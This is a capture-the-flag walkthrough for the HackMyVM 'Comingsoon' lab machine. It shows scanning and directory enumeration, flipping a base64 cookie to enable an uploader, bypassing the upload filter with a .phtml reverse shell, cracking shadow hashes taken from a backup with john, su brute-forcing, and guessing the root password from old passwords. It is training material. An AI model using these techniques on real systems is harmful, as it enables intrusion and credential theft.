HackMyVM - Comingsoon

 

Find it

└─$ sudo netdiscover -r 10.0.0.0/24 -P|tee findit

[sudo] password for kali: 

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 10.0.0.1        08:00:27:96:87:13      1      60  PCS Systemtechnik GmbH

 10.0.0.90       08:00:27:03:05:3c      1      60  PCS Systemtechnik GmbH

-- Active scan completed, 2 Hosts found.

    

Scan it

└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.90 

Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 12:49 EST

Nmap scan report for 10.0.0.90

Host is up (0.00097s latency).

Not shown: 65533 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)

| ssh-hostkey: 

|   3072 bc:fb:ec:b8:93:d4:e2:78:76:eb:1b:dc:4b:a7:7f:9b (RSA)

|   256 31:41:a0:d7:e9:3c:79:11:c2:f0:81:a0:fe:2d:f9:b0 (ECDSA)

|_  256 c9:34:17:00:31:75:4d:c0:3a:a5:b1:16:36:0d:bb:18 (ED25519)

80/tcp open  http    Apache httpd 2.4.51 ((Debian))

|_http-server-header: Apache/2.4.51 (Debian)

|_http-title: Bolt - Coming Soon Template

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 17.51 seconds

└─$ ssh 10.0.0.90      

kali@10.0.0.90: Permission denied (publickey).

 

So 2 ports SSH (looks like its set to keys only)
and http port 80

Remote Shell

└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.90/ -x html,php,txt -o dir.txt --no-error -t 150

===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://10.0.0.90/

[+] Method:                  GET

[+] Threads:                 150

[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.1.0

[+] Extensions:              html,php,txt

[+] Follow Redirect:         true

[+] Timeout:                 10s

===============================================================

2021/12/22 12:54:04 Starting gobuster in directory enumeration mode

===============================================================

/assets               (Status: 200) [Size: 1492]

/license.txt          (Status: 200) [Size: 528] 

/notes.txt            (Status: 200) [Size: 279] 

/index.php            (Status: 200) [Size: 3988]

Notes.txt contains something useful bits:

Set ssh to use keys only (passphrase same as the password)

Just need to sort the images out:
resize and scp them or using the built-in image uploader.

Test the backups and delete anything not needed.

index.php contains a comment:
<!-- Upload images link if EnableUploader set -->

The index.php also has a cookie (can be found with curl -v or using a browser)
Set-Cookie: RW5hYmxlVXBsb2FkZXIK=ZmFsc2UK

└─$ echo RW5hYmxlVXBsb2FkZXIK| base64 -d;echo ZmFsc2UK| base64 -d
EnableUploader
false

Set the value to true...
└─$ echo -n true|base64                                          
dHJ1ZQ==
(Easier in a browser, and an upload button appears)

The uploader dosn't allow .php suffix files to be uploaded, trying various php extensions,
.phtml works and allows a reverse shell to be uploaded.

Escalate to User

From the reverse shell as www-data

Method 1: 
locate recent backup file in /var/backups and copy it to /var/www/html/assets/img
Download to kali box
gunzip and untar it
cd to ./etc
unshahdow passwd shadow > unshadow

Note john doesn't detect correctly $y$ unless you specify the format

john --wordlist=/usr/share/wordlists/rockyou.txt unshadow --format=crypt

This should find credentials for user... but not root.

Method 2:
brute force on the box using suBF.sh and its default wordlist or rockyou

https://github.com/carlospolop/su-bruteforce

Escalate to Root

The user home directory contains a file .oldpasswords
Past password can sometimes point to the current password if they follow a theme or set format.

The theme looks like Animated Movies that contain numbers. Capitals are preserved but spaces removed...

Googling top 100 animated movies will provide the answers.

Alternativley you could try and generate a wordlist using something like:

curl https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/|grep ")</a>"|sed 's/[(].*$//'|tr -d ' '> wordlist

Some trial and error manually (there are only a few candidates) or with suBF.sh should reveal the root password fairly quickly.